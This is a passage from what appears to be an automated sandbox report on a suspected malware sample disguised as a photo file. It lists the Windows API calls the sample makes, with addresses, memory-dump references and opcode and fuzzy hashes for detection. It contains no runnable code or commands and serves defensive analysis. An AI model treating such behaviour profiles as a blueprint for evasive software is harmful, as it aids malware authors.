                                                                        • Part of subcall function 00D70F58: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D70F7A
                                                                        • Part of subcall function 00D70F58: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D70F89
                                                                        • Part of subcall function 00D70F58: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D70F90
                                                                        • Part of subcall function 00D70F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D70FA6
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D71502
                                                                      • _memcmp.LIBVCRUNTIME ref: 00D71525
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D7155B
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D71562
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: 615fcae5bb778a6a7e04fde3a276efed149527ba38d3c9c3eecfd0ec65e8e4bd
                                                                      • Instruction ID: 357764d62e35be524f7270cd72302977f11e3cc6f89f2a64185bd0d399d18de5
                                                                      • Opcode Fuzzy Hash: 615fcae5bb778a6a7e04fde3a276efed149527ba38d3c9c3eecfd0ec65e8e4bd
                                                                      • Instruction Fuzzy Hash: 1B218E31E00209EFDB14DFA8C945BEEB7B9EF84314F188159E459A7240E730EA09CF60
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00DA273D
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DA2757
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DA2765
                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DA2773
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$AttributesLayered
                                                                      • String ID:
                                                                      • API String ID: 2169480361-0
                                                                      • Opcode ID: 623d287fa2f5dcbce8995339f5316ffefc4984aa563948afdb757e98f9ac6082
                                                                      • Instruction ID: d059fb28cf7eeeea1f8bef5ed1587190ac03c75efefed93bbadc575eee934a54
                                                                      • Opcode Fuzzy Hash: 623d287fa2f5dcbce8995339f5316ffefc4984aa563948afdb757e98f9ac6082
                                                                      • Instruction Fuzzy Hash: 3921B031215110AFD7149B19C845FAA7795EF86324F188158F426CB2D2CB71ED82CBB1
                                                                      APIs
                                                                        • Part of subcall function 00D78CD3: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00D77860,?,000000FF,?,00D786AA,00000000,?,0000001C,?,?), ref: 00D78CE2
                                                                        • Part of subcall function 00D78CD3: lstrcpyW.KERNEL32(00000000,?,?,00D77860,?,000000FF,?,00D786AA,00000000,?,0000001C,?,?,00000000), ref: 00D78D08
                                                                        • Part of subcall function 00D78CD3: lstrcmpiW.KERNEL32(00000000,?,00D77860,?,000000FF,?,00D786AA,00000000,?,0000001C,?,?), ref: 00D78D39
                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00D786AA,00000000,?,0000001C,?,?,00000000), ref: 00D77879
                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00D786AA,00000000,?,0000001C,?,?,00000000), ref: 00D7789F
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00D786AA,00000000,?,0000001C,?,?,00000000), ref: 00D778DA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: 4fb9235532cc061728d5284b0d864dc848784021a8eb929ebcd7613e1aa12ee4
                                                                      • Instruction ID: 6fd2c70c019701c4bb59a90e7e4f2493f01711b389d43a5e0b5fca128104f997
                                                                      • Opcode Fuzzy Hash: 4fb9235532cc061728d5284b0d864dc848784021a8eb929ebcd7613e1aa12ee4
                                                                      • Instruction Fuzzy Hash: 4011033A204302ABCB156F38D849A7A77A9EF49350B44842AF906CB260FF719801D7B2
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00DA55F0
                                                                      • _wcslen.LIBCMT ref: 00DA5602
                                                                      • _wcslen.LIBCMT ref: 00DA560D
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DA574B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend_wcslen
                                                                      • String ID:
                                                                      • API String ID: 455545452-0
                                                                      • Opcode ID: f58a0f1c9f08663874d8ba24f3c31acc2102858aefa1ed6bf0fbac4491ccabce
                                                                      • Instruction ID: c4a4e2fd730bd572439691561fe12df0c2ccc05d8de043927ad03ff9bb1f2b38
                                                                      • Opcode Fuzzy Hash: f58a0f1c9f08663874d8ba24f3c31acc2102858aefa1ed6bf0fbac4491ccabce
                                                                      • Instruction Fuzzy Hash: 67119375A00708A6DF20DFA5AC84AEE77BCEF13764F18412AF916D6184EBB4D9448F70
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8447d0cfbf1f6fd969bf66fe9bc49b6084e626ba207d0b3706f0c425d85038dc
                                                                      • Instruction ID: 4d05e1bc6749bc0dcd8857ad4e06b1f6eb1a0b65c62911eb6f1616f74983ff30
                                                                      • Opcode Fuzzy Hash: 8447d0cfbf1f6fd969bf66fe9bc49b6084e626ba207d0b3706f0c425d85038dc
                                                                      • Instruction Fuzzy Hash: 4F01A2F6A463167FF62126786CC1F276B1DDF413B9B380725B521912D2DB708CC14570
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00D7198B
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D7199D
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D719B3
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D719CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: fd11cb0a5292020f6020c38b2069e854456611b1aa917e428fa7038752918dec
                                                                      • Instruction ID: d2df8fd83d04c7602dbc5b7a6080e30756869581c7085d77e9ceffbf844581c4
                                                                      • Opcode Fuzzy Hash: fd11cb0a5292020f6020c38b2069e854456611b1aa917e428fa7038752918dec
                                                                      • Instruction Fuzzy Hash: 5A115A3A900218BFEB109BA8C885F9DBB78EB04350F204191E614B7290D771AE11DBA4
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00D7E11B
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00D7E14E
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D7E164
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D7E16B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                      • String ID:
                                                                      • API String ID: 2880819207-0
                                                                      • Opcode ID: e4915b3944cd7eba169dae0b89186919105fe0db6f49c464353e131d9b435169
                                                                      • Instruction ID: eb4299221223e89cdcc557a4520295d24089dee6498b0745c3d332c6ae31a81f
                                                                      • Opcode Fuzzy Hash: e4915b3944cd7eba169dae0b89186919105fe0db6f49c464353e131d9b435169
                                                                      • Instruction Fuzzy Hash: 8D11DB76B00358BFC7119FA89C46A9F7FADEB49320F048255F819D7391E6708D0487B0
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,?,00D3CF89,00000000,00000004,00000000), ref: 00D3D1A8
                                                                      • GetLastError.KERNEL32 ref: 00D3D1B4
                                                                      • __dosmaperr.LIBCMT ref: 00D3D1BB
                                                                      • ResumeThread.KERNEL32(00000000), ref: 00D3D1D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 173952441-0
                                                                      • Opcode ID: 3e14d4877e066192c8ce9d8c9004caf689b5ccda25a359109be217b3abc68f26
                                                                      • Instruction ID: 9204f8cc32a5815e77c70f8f24d16cb41711248083b76d6c98342f2cfe48abca
                                                                      • Opcode Fuzzy Hash: 3e14d4877e066192c8ce9d8c9004caf689b5ccda25a359109be217b3abc68f26
                                                                      • Instruction Fuzzy Hash: 8B01F936915304BBDB205BB5EC05BAB7B6ADF81730F144219F924961D0CF708940CBB0
                                                                      APIs
                                                                        • Part of subcall function 00D2B021: GetWindowLongW.USER32(?,000000EB), ref: 00D2B032
                                                                      • GetClientRect.USER32(?,?), ref: 00DA9E23
                                                                      • GetCursorPos.USER32(?), ref: 00DA9E2D
                                                                      • ScreenToClient.USER32(?,?), ref: 00DA9E38
                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00DA9E6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 4127811313-0
                                                                      • Opcode ID: f5483959b6d9209ae5cc1bc873c6845dbdf0031f3672348b459a2af8d32090d1
                                                                      • Instruction ID: df515fbdaf941e7b0781ada2de5667584f976816b67b6c0885c97c43c09d07c8
                                                                      • Opcode Fuzzy Hash: f5483959b6d9209ae5cc1bc873c6845dbdf0031f3672348b459a2af8d32090d1
                                                                      • Instruction Fuzzy Hash: E4115A36A0115AEBDF10EF58D895CEEB7B8FB06321F040455F911E7252C330AA95CBB1
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D179F4
                                                                      • GetStockObject.GDI32(00000011), ref: 00D17A08
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D17A12
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                      • String ID:
                                                                      • API String ID: 3970641297-0
                                                                      • Opcode ID: 117639ea9c34b7135f359c32b718263d35976b2a91a1f255c112d68eee5b6584
                                                                      • Instruction ID: f401097568436a15695b36437ad3faa69988c5208bd282a5d72b42b7e477e8cc
                                                                      • Opcode Fuzzy Hash: 117639ea9c34b7135f359c32b718263d35976b2a91a1f255c112d68eee5b6584
                                                                      • Instruction Fuzzy Hash: 9D11C472515649BFEF028F90AC40EEA7BB9EF09364F040111FA0492120CB31DDA0DFB0
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00D33AE6
                                                                        • Part of subcall function 00D33A33: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D33A62
                                                                        • Part of subcall function 00D33A33: ___AdjustPointer.LIBCMT ref: 00D33A7D
                                                                      • _UnwindNestedFrames.LIBCMT ref: 00D33AFB
                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D33B0C
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00D33B34
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                      • String ID:
                                                                      • API String ID: 737400349-0
                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                      • Instruction ID: 4f7cfa6656c7e7b80de9530eb57b23eb2048b92fafe015f09becf19610dd0d5e
                                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                      • Instruction Fuzzy Hash: 30014C72100148BBCF125E95CD42EEB7F79EF58754F094014FE4896121C336E961DBB0
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D5242E,00000000,00000000,?,00D42FAA,00D5242E,00000000,00000000,00000000,?,00D4321B,00000006,FlsSetValue), ref: 00D43035
                                                                      • GetLastError.KERNEL32(?,00D42FAA,00D5242E,00000000,00000000,00000000,?,00D4321B,00000006,FlsSetValue,00DB22B0,FlsSetValue,00000000,00000364,?,00D42DD6), ref: 00D43041
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D42FAA,00D5242E,00000000,00000000,00000000,?,00D4321B,00000006,FlsSetValue,00DB22B0,FlsSetValue,00000000), ref: 00D4304F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: ceb8a00d980d29fe6262aa80766413d1fab138c4f9aa0296953bc9e65e01a3bc
                                                                      • Instruction ID: fad376fa4d49f177d763a5825fd1e8bdbe45b296813d6cc19438ebdc7f968f02
                                                                      • Opcode Fuzzy Hash: ceb8a00d980d29fe6262aa80766413d1fab138c4f9aa0296953bc9e65e01a3bc
                                                                      • Instruction Fuzzy Hash: 83016736711322EBCB318F7DAC84A667798AF46BB1B250720F946D7290D721D915C6F0
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00D773D5
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00D773ED
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00D77402
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00D77420
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: 61dbc0e5a6c9fe05bbf8da6e634c28406d36f169995f759c59c088c96e102574
                                                                      • Instruction ID: a35540f1adc9dff80b16e180549e260fe7dd5444d5b182194ba32c86b47b82ba
                                                                      • Opcode Fuzzy Hash: 61dbc0e5a6c9fe05bbf8da6e634c28406d36f169995f759c59c088c96e102574
                                                                      • Instruction Fuzzy Hash: ED1161B13093049BE7208F50DC09B927FFCEB04B08F50C929A55AD7150E7B0E904DBB1
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D7ABF1,?,00008000), ref: 00D7AFE2
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D7ABF1,?,00008000), ref: 00D7B007
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D7ABF1,?,00008000), ref: 00D7B011
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D7ABF1,?,00008000), ref: 00D7B044
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: 43c9319bb19dc7119b77d53e8a34e82332635206773c19283277a26558fcddf9
                                                                      • Instruction ID: 1b5819d39689f4c6391c0fa9b82d5a3e4f8823dbed0c2a992399bbad71ad4869
                                                                      • Opcode Fuzzy Hash: 43c9319bb19dc7119b77d53e8a34e82332635206773c19283277a26558fcddf9
                                                                      • Instruction Fuzzy Hash: F1115B31D00629E7CF009FE8E9587EEBB78FF1B721F118096E995B2240DB3496518BB5
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00DA7D23
                                                                      • ScreenToClient.USER32(?,?), ref: 00DA7D3B
                                                                      • ScreenToClient.USER32(?,?), ref: 00DA7D5F
                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DA7D7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      • Opcode ID: 08bc69ed83e46da41ac765f488658859c63e2477a73db48a8d54202cd9a5eb8c
                                                                      • Instruction ID: 13bef7f6eda9058e8d33c53baa4212cd3891e626836000627cf728a3aba9e838
                                                                      • Opcode Fuzzy Hash: 08bc69ed83e46da41ac765f488658859c63e2477a73db48a8d54202cd9a5eb8c
                                                                      • Instruction Fuzzy Hash: C91110B9D00249AFDB41DF98C884AEEBBF9FF09310F149166E915E2210D735AA55CFA0
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D72D09
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D72D1A
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00D72D21
                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D72D28
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
